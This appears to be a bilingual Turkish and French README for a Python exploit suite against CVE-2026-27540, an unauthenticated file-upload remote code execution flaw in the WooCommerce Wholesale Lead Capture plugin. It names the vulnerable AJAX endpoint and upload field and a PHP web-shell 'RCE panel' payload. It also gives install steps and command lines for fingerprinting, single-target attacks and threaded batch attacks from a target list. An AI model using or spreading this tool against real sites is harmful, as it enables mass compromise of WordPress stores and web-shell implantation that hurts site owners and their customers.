Suite d'exploitation Python pour CVE-2026-27540, une RCE par téléversement de fichier non authentifié dans le plugin WooCommerce Wholesale Lead Capture, avec fingerprinting, ciblage par lots et une charge utile de panneau RCE.
WooCommerce Wholesale Lead Capture (WWLC) — Kimlik doğrulamasız dosya yükleme → RCE
| Ürün | WooCommerce Wholesale Lead Capture — wwlc eklentisi |
| Sürüm | ≤ 2.0.3.1 |
| Fixed | 2.0.3.2+ — upload handler korumalı |
| Auth | Unauthenticated |
| Vektör | admin-ajax.php?action=wwlc_file_upload_handler |
| Field | file (multipart upload) |
| Yazılan yer | WordPress uploads dizini |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handler POST rate-limitgit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Dosya | Görev |
|---|---|
winrarzips_brand.py | CMD banner (by winrarzips) |
wwlc_core.py | Exploit motoru |
CVE-2026-27540-Suite.py | Batch + tek hedef CLI |
payloads/x7-panel.php | RCE panel |
requirements.txt | Bağımlılıklar |
❌ Hedef listesi, tarama sonucu ve panel URL'leri repo'da yok.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed
WooCommerce Wholesale Lead Capture (WWLC) — Téléversement de fichier non authentifié → RCE
| Produit | WooCommerce Wholesale Lead Capture — plugin wwlc |
| Affecté | ≤ 2.0.3.1 |
| Corrigé | 2.0.3.2+ — gestionnaire de téléversement renforcé |
| Auth | Non authentifié |
| Vecteur | admin-ajax.php?action=wwlc_file_upload_handler |
| Champ | file (téléversement multipart) |
| Chemin d'écriture | Répertoire uploads de WordPress |
| Payload | payloads/x7-panel.php |
wwlc_file_upload_handlergit clone https://github.com/winrarzipsexploit/CVE-2026-27540.git
cd CVE-2026-27540
pip install -r requirements.txt
| Fichier | Rôle |
|---|---|
winrarzips_brand.py | Bannière CMD (by winrarzips) |
wwlc_core.py | Cœur de l'exploit |
CVE-2026-27540-Suite.py | CLI batch + cible unique |
payloads/x7-panel.php | Payload du panneau RCE |
requirements.txt | Dépendances |
❌ Les listes de cibles, les résultats de scan et les URL de panneaux actifs ne sont pas inclus.
python CVE-2026-27540-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-27540-Suite.py -u https://LAB-URL --yes
python CVE-2026-27540-Suite.py -f targets.txt --yes --threads 12
patched_version_* · plugin_not_found · wwlc_absent_or_blocked · upload_ok_verify_failed